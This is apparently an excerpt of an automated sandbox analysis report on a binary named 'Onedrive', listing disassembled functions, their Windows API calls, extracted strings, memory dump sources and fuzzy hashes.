                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CriticalExceptionHandlerInitializeSectionVectored
                                        • String ID:
                                        • API String ID: 1918240263-0
                                        • Opcode ID: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
                                        • Instruction ID: e6af35bf807ac52902eacb24295f33500788fbe22a1c81228975f4ac258fccaa
                                        • Opcode Fuzzy Hash: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
                                        • Instruction Fuzzy Hash: A3E0BFA8E0BE07AAFB089B15EC5537422E5FF58385FC05035D14D56370DF6D65968700

                                        Control-flow Graph

                                        APIs
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A0321199
                                          • Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A03211C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __vcrt_lock$CriticalEnterSection
                                        • String ID:
                                        • API String ID: 3216741998-0
                                        • Opcode ID: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
                                        • Instruction ID: cb4cf3fbf932b02fd07b64f383ac33936b4888ea6c93acdedba695517078de2f
                                        • Opcode Fuzzy Hash: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
                                        • Instruction Fuzzy Hash: 4CE0EC01D0E9C3A1F7343275911637E2A41EF79388F440279EB8D457C7DE6CF2144A62

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CriticalDeleteExceptionHandlerRemoveSectionVectored
                                        • String ID:
                                        • API String ID: 1384964762-0
                                        • Opcode ID: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
                                        • Instruction ID: 7bba5241cf4c1598b26bec6c7fbf86add5eebdab6ebfe8e51b8187148a1570af
                                        • Opcode Fuzzy Hash: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
                                        • Instruction Fuzzy Hash: 48D06798F1BD03AAFA589FA19C9127122A4EF94791FD44430C90EA9360DE9DE59B9700

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
                                        • Instruction ID: e4c61cb12cac1797abd707496bf9b8f3e3408d0fc1d5efe858001bd84e51350e
                                        • Opcode Fuzzy Hash: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
                                        • Instruction Fuzzy Hash: A2219D25A0FB03A5F6508FD6A48017A63A0FF84BC4F688235EF5D83794DF7CE5418640

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _get_purecall_handler
                                        • String ID:
                                        • API String ID: 2826984366-0
                                        • Opcode ID: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
                                        • Instruction ID: 158c9f8bf6ec8556b01a516a5c0a5c992da455ecf4e6e9539da9b12975072e05
                                        • Opcode Fuzzy Hash: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
                                        • Instruction Fuzzy Hash: 0B11286291EB8396EB209B51B04036EBBA1EB9E3C9F040135FACD42B99DF6CD540CB10

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 393 7ff6104fe4e0-7ff6104fe528 __wgetmainargs
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __wgetmainargs
                                        • String ID:
                                        • API String ID: 1709950718-0
                                        • Opcode ID: 7b8df0f035fed5510aa95a0b9caed67fb4fa6e53af1179eb02ea095a1f50ed61
                                        • Instruction ID: 4e33b8fe8640014678feac2880d08049ac6bc91e3f5cab85a1d6bc68bc0dac67
                                        • Opcode Fuzzy Hash: 7b8df0f035fed5510aa95a0b9caed67fb4fa6e53af1179eb02ea095a1f50ed61
                                        • Instruction Fuzzy Hash: F6E07574E0DF43E6EE108B50EA454A937A0BB1DB6CBA04036D80CD3339DE3CA159CB20

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 394 7ff8a0302039-7ff8a030204d call 7ff8a0302120 call 7ff8a0301e80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __security_init_cookie
                                        • String ID:
                                        • API String ID: 1916132197-0
                                        • Opcode ID: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
                                        • Instruction ID: 1e3c162a2e59da6ae959d78d6b6db99994d364ca1d1987eb9fd7a07bc09cea11
                                        • Opcode Fuzzy Hash: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
                                        • Instruction Fuzzy Hash: D9C08C3A92B98283C200AB51E04149E6320FBC97C0F602121FB4E0370A8D2CD4048A40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: memset$CloseErrorHandleLastProcessThreadWindow
                                        • String ID: %windir%\ImmersiveControlPanel\SystemSettings.exe$2F8FA37B-8158-476F-9B22-3283D2A6FEC2$A0BB30C7-DEC2-4BFD-AF5F-DC6612D74584
                                        • API String ID: 3504613239-2751644673
                                        • Opcode ID: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
                                        • Instruction ID: fd8c1f13956dba21a3d3731add509ea18e51f6f572a03af6cea0e937e5c2aa62
                                        • Opcode Fuzzy Hash: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
                                        • Instruction Fuzzy Hash: BAA14D32A08E52D6FF249B25A85027DB6A4FF89FA4F448239DA4EC7794DF3CE5148701
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DirectElement@$Descendent@ElementFindFreeListener@Listener@2@@TaskV12@
                                        • String ID: CallNumber$IIDText$Instructions$Number1$Number2$Number3$Number4$Number5$Number6$Number7$Number8$Number9$PrivacyLink$TollFree$TollMain
                                        • API String ID: 4084670624-4122676257
                                        • Opcode ID: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
                                        • Instruction ID: 837037ac15d57718cd18c232cc780ffa80da7c5db9c170f7ec410f1b8e6d0c4b
                                        • Opcode Fuzzy Hash: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
                                        • Instruction Fuzzy Hash: 10511B60B0CF57E2FE149B6ADA901791698AF4DFA8F005031CA0DCB35ADE6DF528C711
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: new[]
                                        • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                                        • API String ID: 4059295235-458177602
                                        • Opcode ID: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
                                        • Instruction ID: b2292e5c943d63d2e3cc45ec9b9d436b7a0fe3cae1617ab6c255e5f0e70970b3
                                        • Opcode Fuzzy Hash: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
                                        • Instruction Fuzzy Hash: F2322C36A1EF8695EB608B15E48037A77A5FB897D1F104536DA8D87BA4DF3DE480CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: FreeHeap$Local$Process$AllocCloseInformationLicensingOpenStatus
                                        • String ID: UXDifferentiator
                                        • API String ID: 3977053813-2471664420
                                        • Opcode ID: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
                                        • Instruction ID: 0af6d77ceaa34daa1e20ad0ebf5cf5618463e07a3fa3acf4226487d5388333f9
                                        • Opcode Fuzzy Hash: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
                                        • Instruction Fuzzy Hash: 25A16C72A08E02EAEF118F6594903BD7BA5FB89BA8F145534DE0E97B54DF38E4658300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Free$Process$ErrorLast$FileLibrarySetup$CloseDirectoryLoadOpenSystem
                                        • String ID: TapiCodes$tapiGetLocationInfo
                                        • API String ID: 3084871228-3986397507
                                        • Opcode ID: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
                                        • Instruction ID: 163e0eaaffc0a69f3a1ab2e6d4e204e8ea66f19343416416dcc41f9590d522a3
                                        • Opcode Fuzzy Hash: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
                                        • Instruction Fuzzy Hash: 44516B31A08E42E6FF149B29A4502BD77A4FF89FA4F449135EA1ED6788EF3CE4158700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Container_base12Container_base12::~_std::_$FileFind$Concurrency::details::_FirstNextSchedulerScheduler::__wcsupr_stype_info::_name_internal_method
                                        • String ID:
                                        • API String ID: 1493447076-0
                                        • Opcode ID: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
                                        • Instruction ID: ff07c478e14f4cf3b9a7eb10426a7cff36fc6a29434019a3bb27a3f2cc50f017
                                        • Opcode Fuzzy Hash: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
                                        • Instruction Fuzzy Hash: 31B1516261EE8291DB60DB19E4903BEA3A4FBD97C0F500136E68D87BA9DF3CD545CB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_CrtIsValidHeapPointer(block)$__acrt_first_block == header$__acrt_last_block == header$header->_block_use == block_use || header->_block_use == _CRT_BLOCK && block_use == _NORMAL_BLOCK$header->_line_number == line_number_for_ignore_blocks && header->_request_number == request_number_for_ignore_blocks$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
                                        • API String ID: 0-3956125450
                                        • Opcode ID: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
                                        • Instruction ID: 329dcb8ced25fc3ab8d3bc01a56a48c0c206120f55445c89eae31a013a3e1bc7
                                        • Opcode Fuzzy Hash: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
                                        • Instruction Fuzzy Hash: F8225F36A0EF8696EB60CB55E48076AB7A4FB887D1F100436EA8D87B64DF7DD454CB00
                                        APIs
                                          • Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9425
                                          • Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9439
                                          • Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9460
                                          • Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9474
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8E6B
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8E80
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8EA1
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8EB6
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8ED7
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8EEC
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F0D
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F22
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F43
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F58
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F79
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F8E
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8FAF
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8FC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
                                        • Instruction ID: 50f628e1fbcb9f66dbc65f63b39aa8aba56a8658acec4b74486a99585ede9a56
                                        • Opcode Fuzzy Hash: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
                                        • Instruction Fuzzy Hash: 83410B22A04E42E7EF149B2591583BDBBE0FF5DF59F498139D70A86359CF38D1248350
                                        APIs
                                        • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7B76
                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7C3A
                                        • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7C54
                                        • memset.MSVCRT ref: 00007FF6104F7C7A
                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7CE9
                                        • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7CFE
                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7D76
                                        • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7D8B
                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7E03
                                        • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7E18
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess$CreateInstancememset
                                        • String ID:
                                        • API String ID: 2970048943-0
                                        • Opcode ID: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
                                        • Instruction ID: d17e468fcc0bb56388c74ce04f51a05fa44a9b4b20c83794b6546ef9d8ecab4c
                                        • Opcode Fuzzy Hash: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
                                        • Instruction Fuzzy Hash: DEC16C32A18F82D2EB04DB29D9901AD37A4FB49F94B119636DA4DC3765EF3CE5A4C300
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64C0
                                        • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64D5
                                        • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64F2
                                        • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6507
                                        • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6524
                                        • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6539
                                        • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6556
                                        • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F656B
                                        • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6588
                                        • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F659D
                                        • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65CD
                                        • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65E1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
